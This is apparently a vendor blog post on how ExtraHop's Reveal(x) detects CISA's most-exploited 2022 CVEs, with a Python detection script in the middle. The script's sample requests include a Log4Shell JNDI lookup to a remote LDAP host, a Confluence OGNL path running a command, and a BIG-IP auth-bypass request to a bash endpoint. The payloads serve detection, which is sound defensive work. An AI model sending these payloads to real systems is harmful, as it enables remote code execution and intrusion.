As the ExtraHop product management team prepared for a user group meeting in Minneapolis in early September, team members wanted to show attendees a scorecard highlighting the value of the Reveal(x) NDR platform.
They found the perfect measurement tool. Weeks earlier, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released the list of the 12 most routinely exploited vulnerabilities during 2022, and the team found that the core NDR functionality in Reveal(x) detects nine of those 12 common exploits, including ProxyShell and Log4Shell.
Including the Reveal(x) IDS module, released earlier this year, the number of detections jumps to 11 of 12.
It’s no accident that Reveal(x) offers detections for 11 of the 12 most routinely exploited vulnerabilities from 2022. First, Reveal(x) ingests network traffic and uses machine learning to detect malicious activity and understand security risks and exposure. It combines detection for known attack behavior with the ability to understand what is normal for any given organization, flagging unusual shifts that can indicate an attack. When threat actors use the network to move laterally within a victim’s environment, Reveal(x) detects that movement and alerts users to potential security incidents.
Second, the ExtraHop team prioritizes new detectors based on the top vulnerabilities, exploits, tools, and attack techniques it observes, and takes into consideration requests from customers and potential customers. Breadth of coverage for network-addressable attack techniques is also a major goal, says Eric Hayden, an ExtraHop product manager.
The match of detectors to the CISA list “highlights that our internal prioritization process works,” Hayden adds. “The team considers a variety of factors to determine what we should build a detector for. We understand the threat landscape, and we build detectors that are going to have the most impact and provide the most value to our customers.”
In addition to human-led creation of detections, ExtraHop also uses machine learning techniques to identify anomalous behavior and generate new detections. This combination of detection-creation techniques gives Reveal(x) wide coverage of the MITRE ATT&CK framework.
ExtraHop customers can use Reveal(x) to identify whether any of these vulnerabilities exist in their environment. Because these vulnerabilities are commonly exploited by threat actors, security teams will likely want to prioritize them for patching to shrink their attack surface and reduce their risk exposure. These detection capabilities are also useful reporting tools for boards of directors: they allow CISOs to demonstrate that their security teams are able to proactively identify and remediate known and highly exploited vulnerabilities.
Reveal(x) detections provide east-west traffic visibility, and the NDR tool offers traffic decryption functionality that vulnerability scanners do not include, providing additional context to security teams during investigation and response.
Top CVEs detected by Reveal(x) NDR
- CVE-2021-34473 and CVE-2021-34523: These vulnerabilities, used in the ProxyShell family of attacks, affect Microsoft Exchange email servers. Successful exploitation enables a remote actor to execute arbitrary code. The vulnerabilities reside within the Microsoft Client Access Service (CAS), which is commonly exposed to the internet to enable users to access their email through mobile devices and web browsers.
- CVE-2021-44228: This vulnerability, known as Log4Shell, impacts Apache’s Log4j library, an open-source logging framework incorporated into thousands of products. An attacker can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code. The request allows the attacker to take full control of a system.
- CVE-2018-13379: This vulnerability, affecting Fortinet SSL VPNs, was also routinely exploited in 2020 and 2021. The continuing exploitation suggests that many organizations have failed to patch the software, according to CISA.
- CVE-2021-26084: This vulnerability, affecting web-based collaboration tool Atlassian Confluence Server and Data Center, could enable an unauthenticated threat actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a proof of concept was released within a week of its disclosure.
- CVE-2022-26134: This critical remote code execution vulnerability also affects Atlassian Confluence Server and Data Center. The vulnerability, which was likely exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability, CISA said.
- CVE-2022-1388: This vulnerability allows unauthenticated malicious cyber actors to bypass iControl REST authentication on F5 BIG-IP application delivery and security software.
- CVE-2022-30190: This vulnerability impacts the Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated cyber actor could exploit this vulnerability to take control of an affected system.
- CVE-2022-22954: This vulnerability allows remote code execution, privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. A malicious cyber actor with network access could trigger a server-side template injection that may result in remote code execution.
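As an added illustration of the kind of on-the-wire indicators the bullets above describe (this is example code written for this page, not Reveal(x) code, and ExtraHop does not publish its detection logic here), the following Python inspects constructed HTTP requests for three of the listed CVEs: a Log4j JNDI lookup (CVE-2021-44228) after collapsing the common `${lower:}`, `${upper:}` and `${x:-y}` obfuscations, an OGNL static-method call smuggled into a Confluence request path (CVE-2022-26134), and an iControl REST request that lists `X-F5-Auth-Token` in the `Connection` header (CVE-2022-1388). The sample requests, the field names and the simplified indicators are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample requests (not real captures): one benign, one plain Log4Shell probe,
# one obfuscated Log4Shell probe, one Confluence OGNL path, one harmless Log4j lookup,
# and one BIG-IP iControl REST auth-bypass request.
SAMPLE_REQUESTS = [
    {"method": "GET", "path": "/index.html", "headers": {"User-Agent": "Mozilla/5.0"}},
    {"method": "GET", "path": "/login",
     "headers": {"User-Agent": "${jndi:ldap://203.0.113.5:1389/a}"}},
    {"method": "GET", "path": "/api",
     "headers": {"X-Api-Version": "${${lower:j}${lower:n}di:${lower:l}dap://203.0.113.5/x}"}},
    {"method": "GET",
     "path": "/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29%7D/",
     "headers": {}},
    {"method": "GET", "path": "/search?q=${date:yyyy}", "headers": {}},
    {"method": "POST", "path": "/mgmt/tm/util/bash",
     "headers": {"Connection": "X-F5-Auth-Token, close", "X-F5-Auth-Token": "x",
                 "Authorization": "Basic YWRtaW46"}},
]

# Innermost ${...} lookup: no nested "$", "{" or "}" inside the braces.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after de-obfuscation; case-insensitive because Log4j is.
_LOG4SHELL = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# OGNL expression containing a static reference such as @java.lang.Runtime@.
_OGNL_PATH = re.compile(r"\$\{[^}]*@[\w.]+@")


def resolve_lookups(value):
    """Collapse Log4j-style obfuscation (${lower:j}, ${upper:n}, ${x:-j}) to plain text.

    Unknown lookups such as ${jndi:...} or ${date:...} are left untouched, so the
    loop stops as soon as a pass changes nothing.
    """
    def _repl(match):
        body = match.group(1)
        if ":-" in body:                      # default-value trick: ${anything:-j} -> j
            return body.split(":-", 1)[1]
        if body.lower().startswith("lower:"):
            return body[6:].lower()
        if body.lower().startswith("upper:"):
            return body[6:].upper()
        return match.group(0)

    previous = None
    while previous != value:
        previous, value = value, _INNER_LOOKUP.sub(_repl, value)
    return value


def inspect_request(req):
    """Return a list of (CVE, field) findings for one parsed HTTP request."""
    findings = []
    headers = {k.lower(): v for k, v in req["headers"].items()}
    decoded_path = unquote(req["path"])

    # Log4Shell: a JNDI lookup in any field a vulnerable server might log.
    fields = [("path", decoded_path)] + [(f"header:{k}", unquote(v)) for k, v in headers.items()]
    for name, value in fields:
        if _LOG4SHELL.search(resolve_lookups(value)):
            findings.append(("CVE-2021-44228", name))

    # Confluence: OGNL static call in the URI path (percent-decoded first).
    if _OGNL_PATH.search(decoded_path):
        findings.append(("CVE-2022-26134", "path"))

    # BIG-IP: iControl REST request asking the front end to strip X-F5-Auth-Token.
    if (decoded_path.startswith("/mgmt/")
            and "x-f5-auth-token" in headers
            and "x-f5-auth-token" in headers.get("connection", "").lower()):
        findings.append(("CVE-2022-1388", "header:connection"))

    return findings


def scan(requests):
    """Run inspect_request over a batch and tag each finding with its request index."""
    return [(i, f) for i, req in enumerate(requests) for f in inspect_request(req)]


if __name__ == "__main__":
    for index, finding in scan(SAMPLE_REQUESTS):
        print(f"request {index}: {finding[0]} via {finding[1]}")
```

Two caveats a practitioner would keep in mind: these checks only work on plaintext, so in practice they sit behind TLS decryption of the kind the article mentions, and the de-obfuscation here covers only percent-encoding and the nested Log4j lookups; payloads carried in base64, in a request body, or split across fields need deeper parsing than a string match.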
Vulnerabilities detected by Reveal(x) IDS
- CVE-2021-40539: This vulnerability enables unauthenticated remote code execution in Zoho ManageEngine ADSelfService Plus and was linked to the usage of an outdated third-party dependency. Initial exploitation of this vulnerability began in late 2021 and continued throughout 2022.
- CVE-2021-31207: This is another vulnerability in the ProxyShell family of attacks affecting Microsoft Exchange email servers.